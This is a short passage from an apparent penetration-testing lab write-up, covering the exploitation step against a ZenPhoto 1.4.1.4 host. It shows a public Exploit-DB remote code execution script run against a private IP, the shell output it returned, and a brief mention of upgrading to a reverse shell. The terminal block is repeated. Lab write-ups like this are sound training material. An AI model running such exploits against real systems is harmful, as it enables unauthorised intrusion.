Exploitation

╭─      /home/kali/ZenPhoto ▓▒░────────────────────────────────────────────░▒▓ INT ✘  10m 48s    root@kali 
╰─ php /usr/share/exploitdb/exploits/php/webapps/18083.php 192.168.135.41 /test/

+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+

zenphoto-shell# ls
class.auth.php
class.file.php
class.history.php
class.image.php
class.manager.php
class.pagination.php
class.search.php
class.session.php
class.sessionaction.php
class.upload.php
config.base.php
config.php
config.tinymce.php
data.php
function.base.php

zenphoto-shell# ls /tmp

The exploit had a pretty annoying shell so I had to upgrade it using a my own shell.sh and changing its permissions and then catch a reverse shell in another listener.

PreviousSMTP NextPriv Escalation

Last updated 2 years ago

╭─      /home/kali/ZenPhoto ▓▒░────────────────────────────────────────────░▒▓ INT ✘  10m 48s    root@kali 
╰─ php /usr/share/exploitdb/exploits/php/webapps/18083.php 192.168.135.41 /test/

+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+

zenphoto-shell# ls
class.auth.php
class.file.php
class.history.php
class.image.php
class.manager.php
class.pagination.php
class.search.php
class.session.php
class.sessionaction.php
class.upload.php
config.base.php
config.php
config.tinymce.php
data.php
function.base.php

zenphoto-shell# ls /tmp

The exploit had a pretty annoying shell so I had to upgrade it using a my own shell.sh and changing its permissions and then catch a reverse shell in another listener.

ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code ExecutionExploit Database